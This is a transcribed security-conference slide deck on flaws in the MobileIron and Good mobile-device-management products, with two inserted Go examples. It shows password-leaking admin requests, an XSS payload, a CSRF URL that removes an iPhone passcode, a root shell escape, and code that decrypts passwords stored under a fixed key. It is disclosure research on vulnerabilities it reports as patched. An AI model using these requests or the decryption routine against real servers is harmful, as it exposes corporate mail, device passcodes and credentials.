The Security of MDM systems Hack In Paris 2013 Sebastien Andrivet

Page 1: The Security of MDM systems

Hack In Paris 2013
Sebastien Andrivet

Copyright © 2013 ADVTOOLS SARL

Page 2: Who am I?

Sebastien Andrivet
Switzerland (Geneva)
Specialized in security: mobiles (iOS, Android), forensics
Developer: C++, x86 and ARM
(Cyberfeminist & Hacktivist)

Page 3: Agenda

Smart devices, BYOD, COPE, ...
MDM typical features
MDM market
MDM & security - on paper
MDM & security - findings

Page 4: Smart devices

Page 5: [image slide, no text]

Page 6: MDM, MAM, ...

MDM: Mobile Device Management
MAM: Mobile Application Management
MCM: Mobile Content Management
Etc.

Page 7: MDM - Typical features

Device inventory tracking
Software inventory tracking
Telephone expense management
Device tracking
Backup & restore
Remote lock, wipe, etc.
App deployment
Etc.

Page 8: BYOD - COPE

BYOD: “Bring Your Own Device”
COPE: “Corporate Owned, Personally Enabled”
Differences: costs, ownership, management

Page 9: NOC, not NOC

Some products use a central relay, a Network Operations Center (NOC):
BlackBerry
Good Technology
Others do not:
MobileIron

Page 10: Deployment

On premise (virtual server)
Appliance
Cloud-based

Page 11: MDM Market

[Chart] Source: Gartner (May 2013)

Page 12: MobileIron

Management of devices: iOS, Android, BlackBerry, Windows Phone, ...
Enterprise App Store
Integration into the enterprise with an API
Exchange/Notes proxy (Sentry)
No NOC; on-premise or cloud
Uses native apps (thin agent)

Page 13: Good

Management of devices: iOS, Android, Windows Phone, ... (not BlackBerry)
Enterprise App Store
Access to Exchange/Notes through the Good server
NOC
Uses its own apps (thick agent): e-mail, calendar, contacts

Page 14: Security on Paper

Page 15: CVE, exploit-db, ...

CVE Details: nothing
Exploit-DB: only 1 entry, for MobileIron (June 10, 2013)
Open Security Research: about hacking Good (reading mails)
A paper from iSEC Partners
Some references about SCEP
xCon

Page 16: Switzerland

Page 17: My Target

Is it possible for an operator (MDM admin) to read / steal e-mails without authorization?
If yes, is it traceable?

Page 18: In other terms

Is it possible for an IT employee to steal information from his or her employer, like e-mails of the management, about clients, ..., and sell them to Germany, France, the United States, ...?

Page 19: My Tests

These products are big; it takes time to test them entirely.
So I focus only on some aspects:
Installation / deployment
Enrollment of devices
Management interface

Page 20: Timeframe

First series of tests in Oct.-Dec. 2012
Second series in June 2013
MDM: MobileIron, Good
Both with Exchange
On premise (virtual machines)

Page 21: Good - Network

[Diagram: MDM server inside your network, behind the firewall, no DMZ; connected to the Good NOC; self-service]

Page 22: MobileIron - Network

[Diagram: MDM server behind the firewall]

Page 23: MobileIron - Network

[Diagram: Internal LAN (Exchange, AD, etc.) | Firewall | DMZ (MDM) | Firewall | Internet]
Internet side: tcp/443 (https), tcp/8080, tcp/9997, tcp/9998
Internal LAN side: tcp/389-636 (LDAP/LDAPS), tcp/443 (https)

Page 24: Operating Systems

MobileIron: CentOS
Good: Windows Server 2008

Page 25: Processes

Good runs as Administrator of the server: no least privilege, and not possible to change it
MobileIron: separate users (tomcat, apache, mysql, ...)

Page 26: Exchange

MobileIron: Exchange proxy (ActiveSync), “Sentry”
Good: you have to give the Good server almost all rights on the Exchange mailboxes

Page 27: Good & Mails

You are not reading the e-mails; the Good server does.
All you need to read someone's e-mails is to enroll a new device (OTA).
No need for the user's password.
An MDM admin can do that.
See Open Security Research (April 2012).

Page 28: Admin Interface

MobileIron
Important: this was the state last year (Dec. 2012)

Page 29: Admin Interface

<Removed in this public version>

Page 30: Retrieve Passwords in Clear

“Magic” request:
https://server.lab/misc/misc.html?action=getLocalUserList&limit=20
Gives the passwords in clear of... your colleagues!
Mitigating factor: you have to be authenticated.

[Screenshot: my password, and my colleague's password, both in clear]

Page 31: Another magic request

https://server.lab/mifs/admin/ud.html?action=getLDAPConfigs
Gives the password in clear of the LDAP (AD) account!
Mitigating factor: you have to be authenticated.

Page 32: Cross-Site Scripting

In various places. Payload used:
<img src=1.gif onerror=alert('XSS_in_Name')>

Page 33: Cross-Site Scripting

<Removed in this public version>

Page 34: Cross-Site Scripting - Good

They take anti-XSS measures everywhere, except in one place.

Page 35: Mitigation

Good & MobileIron session cookies are Secure and HttpOnly
So not so easy to steal (by XSS, ...)
MobileIron: X-Frame-Options: SAMEORIGIN

Page 36: Cross-Site Request Forgery

MobileIron: no anti-CSRF measures anywhere; POST can be replaced by GET, so very easy to trigger with an image, ...
Good: no anti-CSRF measures anywhere either, but POSTs only

Page 37: Example - PoC #1

Remove iPhone passcode
When an iOS device is enrolled (configuration profile), an MDM can remove the passcode over-the-air.
Only the MDM can do that (validated by certificates).
Using the CSRF vulnerabilities of MobileIron, I have developed a PoC to remove the passcode of a given iPhone.

Page 38: Example - PoC #1

The PoC sends the following (using an <IMG> tag):
https://server/mifs/admin/ud.html?action=unlockpassword&phone=[{%22deviceId%22%3A%23fb2acc3e-47c7-502a-8a80-8fd7dfd97a86%22}]
“23fb...86” is the UUID of the phone to unlock.
Of course, some social engineering (or XSS) is necessary.
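An added example, not code from the talk and not MobileIron's own, of what PoC #1 exploits and of the fix the talk later reports (anti-CSRF tokens per session). The Go program models an unlock action in its 2012 form, reachable by any authenticated GET such as the one an <IMG> tag triggers in a logged-in admin's browser, next to a hardened version that only accepts a POST carrying the session's token. The cookie name JSESSIONID, the parameter names deviceId and csrfToken and the device identifier are assumptions for this example; the requests are built in-process with httptest, so it runs offline.

```go
package main

import (
	"crypto/rand"
	"crypto/subtle"
	"encoding/hex"
	"fmt"
	"net/http"
	"net/http/httptest"
	"net/url"
	"strings"
)

// Constructed demo data; cookie name, parameter names and device ID are assumptions, not MobileIron's.
const demoDevice = "device-0001"

type mdmServer struct {
	passcodeSet  map[string]bool // device ID -> a passcode is currently set
	sessionToken string          // anti-CSRF token bound to the (single) admin session
}

// newServer builds the demo state plus one random per-session anti-CSRF token: the admin UI
// embeds it in its forms, and a page on another origin cannot read it, so it cannot supply it.
func newServer() *mdmServer {
	b := make([]byte, 16)
	if _, err := rand.Read(b); err != nil {
		panic(err)
	}
	return &mdmServer{passcodeSet: map[string]bool{demoDevice: true}, sessionToken: hex.EncodeToString(b)}
}

// isAdmin models "you have to be authenticated"; browsers attach the cookie automatically, which is what CSRF exploits.
func (s *mdmServer) isAdmin(r *http.Request) bool {
	c, err := r.Cookie("JSESSIONID")
	return err == nil && c.Value == "admin-session"
}

// vulnerableUnlock is the 2012 behaviour: any authenticated request, GET included, removes the passcode.
func (s *mdmServer) vulnerableUnlock(w http.ResponseWriter, r *http.Request) {
	if !s.isAdmin(r) {
		http.Error(w, "login required", http.StatusUnauthorized)
		return
	}
	if id := r.URL.Query().Get("deviceId"); s.passcodeSet[id] {
		s.passcodeSet[id] = false
	}
	w.WriteHeader(http.StatusOK)
}

// hardenedUnlock requires POST and a form token equal to the session's (constant-time compare).
func (s *mdmServer) hardenedUnlock(w http.ResponseWriter, r *http.Request) {
	if !s.isAdmin(r) {
		http.Error(w, "login required", http.StatusUnauthorized)
		return
	}
	if r.Method != http.MethodPost {
		http.Error(w, "POST required", http.StatusMethodNotAllowed)
		return
	}
	if subtle.ConstantTimeCompare([]byte(r.PostFormValue("csrfToken")), []byte(s.sessionToken)) != 1 {
		http.Error(w, "missing or wrong CSRF token", http.StatusForbidden)
		return
	}
	if id := r.PostFormValue("deviceId"); s.passcodeSet[id] {
		s.passcodeSet[id] = false
	}
	w.WriteHeader(http.StatusOK)
}

// asAdminBrowser delivers req to h with the admin's session cookie attached, as the victim's browser would.
func asAdminBrowser(h http.HandlerFunc, req *http.Request) int {
	req.AddCookie(&http.Cookie{Name: "JSESSIONID", Value: "admin-session"})
	rec := httptest.NewRecorder()
	h(rec, req)
	return rec.Code
}

// forgedGET is what <img src="https://server/...?action=unlockpassword&deviceId=..."> on an attacker page produces.
func forgedGET(h http.HandlerFunc, id string) int {
	return asAdminBrowser(h, httptest.NewRequest(http.MethodGet, "/ud.html?action=unlockpassword&deviceId="+id, nil))
}

// postForm: withToken=false is an auto-submitted cross-site form, withToken=true the legitimate admin UI.
func postForm(s *mdmServer, h http.HandlerFunc, id string, withToken bool) int {
	form := url.Values{"deviceId": {id}}
	if withToken {
		form.Set("csrfToken", s.sessionToken)
	}
	req := httptest.NewRequest(http.MethodPost, "/ud.html?action=unlockpassword", strings.NewReader(form.Encode()))
	req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
	return asAdminBrowser(h, req)
}

func main() {
	v, h := newServer(), newServer()
	fmt.Println("vulnerable, forged GET:", forgedGET(v.vulnerableUnlock, demoDevice), "passcode set:", v.passcodeSet[demoDevice])
	fmt.Println("hardened, forged GET:", forgedGET(h.hardenedUnlock, demoDevice), "cross-site POST:", postForm(h, h.hardenedUnlock, demoDevice, false), "passcode set:", h.passcodeSet[demoDevice])
	fmt.Println("hardened, admin UI POST:", postForm(h, h.hardenedUnlock, demoDevice, true), "passcode set:", h.passcodeSet[demoDevice])
}
```

The authentication check is the "mitigating factor" the slides mention and it does nothing against CSRF, because the victim's browser supplies the cookie. Refusing GET alone only closes the <IMG> vector and leaves the auto-submitted form that the Good PoC uses; the per-session token is what actually closes both.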

Page 39: Example - PoC #2

Good
By combining data leakage + XSS + CSRF, we were able to give admin rights to any user.

Page 40: Example - PoC #2

Contrary to MobileIron, CSRF with GET is not possible; use POST instead.

Page 41: Command Line

MobileIron also has a command line interface, a little like a router
“enable” command for privileged actions
May also be accessible from SSH or Telnet, depending on configuration

Page 42: Remote Command Execution

Not found by myself, but by “prdelka” (Exploit-DB, June 10, 2013)
The “show log” command uses “less” underneath, through sudo
Execute a shell command inside “less” with “!” or “|”
Executed as root
This is patched now

Page 43: Today

These problems (XSS, CSRF, retrieving passwords in clear, ...) have been fixed in the latest versions of MobileIron:
Filtering and replacement to avoid XSS (not sure (hum...) it is correctly done, but no time to investigate further)
Anti-CSRF tokens (per session)
But some other problems remain...

Page 44: Weak Encryption

Both products use AES, SHA, etc.
They are FIPS-blah-blah certified
But what about the keys...

Page 45: MobileIron Local Users

With MobileIron, administrators are local users; not possible to use LDAP (AD) users
Stored in an XML file, identityconfig.xml
Passwords encrypted

Page 46: MobileIron Local Users

base-64 encoding
AES encryption, in ECB mode
PKCS#5 padding
key... a passphrase derived with SHA-1, one time
<actual passphrase not disclosed in this public version>

Page 47: PoC #3

Fixed, identical key for all installations
No salt, no iterations (1), no PBKDF2, ...
We have made a small Java application to “recover” passwords from a given installation
The same encryption is used for various other information

Page 48: User Accounts

MobileIron stores accounts (smart device users) in a MySQL database, table mi_users
Same hash, but not the same encrypted password (sometimes). Are they using a salt?

Page 49: Keys

No. It uses... 5 keys
These keys are initialized at startup with fixed, hardcoded values
To encrypt a password, one of those keys is chosen randomly
To verify a password, each key is tried one by one...
The same mechanism is used for other passwords

Page 50: PoC #4

We have made a small Java application to “recover” passwords from:
a MySQL database
a MobileIron backup
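An added example, written for this page and not the talk's Java tool nor MobileIron's code, of the storage scheme pages 46 to 49 describe and of why PoC #3 and PoC #4 are possible: base64 of AES-ECB with PKCS#5 padding under a key derived once with SHA-1 from a fixed passphrase, and the "try each key in turn" logic that a handful of hardcoded keys invites. The passphrase, the truncation of SHA-1's 20 bytes to a 16-byte AES-128 key, the candidate keys and the sample password are assumptions (the real passphrase is withheld in the public slides).

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/sha1"
	"encoding/base64"
	"errors"
	"fmt"
)

// Assumption (not from the talk, whose real passphrase is withheld): a fixed passphrase, hashed once
// with SHA-1 and truncated to 16 bytes, is the AES-128 key. The truncation is this example's choice.
const assumedPassphrase = "fixed-passphrase-shared-by-all-installations"

func keyFromPassphrase(passphrase string) []byte {
	sum := sha1.Sum([]byte(passphrase))
	return sum[:16]
}

func pkcs5Pad(b []byte) []byte {
	n := aes.BlockSize - len(b)%aes.BlockSize
	return append(b, bytes.Repeat([]byte{byte(n)}, n)...)
}

func pkcs5Unpad(b []byte) ([]byte, error) {
	if len(b) == 0 || len(b)%aes.BlockSize != 0 {
		return nil, errors.New("bad length")
	}
	n := int(b[len(b)-1])
	if n == 0 || n > aes.BlockSize || !bytes.Equal(b[len(b)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return nil, errors.New("bad padding")
	}
	return b[:len(b)-n], nil
}

// ecbEncrypt reproduces the stored format the talk describes: AES in ECB mode, PKCS#5 padding,
// base64. No IV and no salt, so the same password always yields the same stored value.
func ecbEncrypt(key, plaintext []byte) string {
	block, err := aes.NewCipher(key)
	if err != nil {
		panic(err)
	}
	padded := pkcs5Pad(append([]byte(nil), plaintext...))
	out := make([]byte, len(padded))
	for i := 0; i < len(padded); i += aes.BlockSize {
		block.Encrypt(out[i:i+aes.BlockSize], padded[i:i+aes.BlockSize])
	}
	return base64.StdEncoding.EncodeToString(out)
}

// ecbDecrypt is all that someone holding identityconfig.xml, the MySQL table or a backup, plus the
// fixed key, has to do; the "recovery" is plain decryption, no cracking involved.
func ecbDecrypt(key []byte, b64 string) ([]byte, error) {
	ct, err := base64.StdEncoding.DecodeString(b64)
	if err != nil {
		return nil, err
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	if len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return nil, errors.New("bad ciphertext length")
	}
	out := make([]byte, len(ct))
	for i := 0; i < len(ct); i += aes.BlockSize {
		block.Decrypt(out[i:i+aes.BlockSize], ct[i:i+aes.BlockSize])
	}
	return pkcs5Unpad(out)
}

func printable(b []byte) bool {
	for _, c := range b {
		if c < 0x20 || c > 0x7e {
			return false
		}
	}
	return true
}

// recoverWithKeys mirrors the "try each key one by one" check the talk describes for mi_users; with a
// few hardcoded keys the attacker does the same. Acceptance here is valid padding plus printable text.
func recoverWithKeys(keys [][]byte, b64 string) (string, int, error) {
	for i, k := range keys {
		if pt, err := ecbDecrypt(k, b64); err == nil && printable(pt) {
			return string(pt), i, nil
		}
	}
	return "", -1, errors.New("no candidate key decrypted the value")
}

func main() {
	key := keyFromPassphrase(assumedPassphrase)
	stored := ecbEncrypt(key, []byte("Secret123!")) // constructed sample password
	fmt.Println("stored value:", stored)
	candidates := [][]byte{keyFromPassphrase("other-key-1"), keyFromPassphrase("other-key-2"), key}
	pw, idx, err := recoverWithKeys(candidates, stored)
	fmt.Println("recovered:", pw, "key index:", idx, "err:", err)
}
```

With no salt and no IV, two users who share a password get identical stored values, which is why the talk asks on page 48 whether a salt is used: only the random choice among five fixed keys makes the values differ sometimes. The printable-text check is this example's acceptance heuristic; valid PKCS#5 padding alone accepts a wrong key about once in 256 tries.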

Page 51: But wait a minute...!

Why is MobileIron storing those passwords? In particular for LDAP (external) users?
Where are these passwords coming from?
From the self-service portal?
From the Sentry server (ActiveSync)?
From the NSA?
From space?

Page 52: They come from...

From the smart device app, during enrollment: the password is transmitted and stored
“Save User Password Preferences”, related to Exchange profiles
MobileIron recommends checking Yes
DO NOT DO THAT!

Page 53: Agents on devices

“Practical Attacks against Mobile Device Management (MDM)”, BlackHat 2013, Lacoon Mobile Security
How to break Good (and others) secure containers
But I personally don't agree with them regarding iOS

Page 54: Agents on devices

“Auditing Enterprise Class Applications and Secure Containers on Android”, iSEC Partners, Dec. 2012
Only Android
Good & MobileIron
Breaking encryption keys, defeating rooting detection, ...

Page 55: More...

There are several more points:
MobileIron & iOS keychain
Good AES key generation
Jailbreak detection
Etc.
But time is limited. Perhaps for another talk...

Page 56: Conclusion

The actual security of an MDM solution is very dependent on its configuration (for ex. “Save user password”)
Very dependent on the deployment context
Case by case, like any somewhat complex system

Page 57: Conclusion

Security was not the priority of MDM systems, at least during development
The situation is improving, but there are still vulnerable points like encryption
Difficult to say that one product is safer than another: Good is better programmed, but the Good NOC is a problem

Page 58: Thank you!

Follow me on Twitter: @AndrivetSeb
Web site: www.advtools.com
My e-mail: [email protected]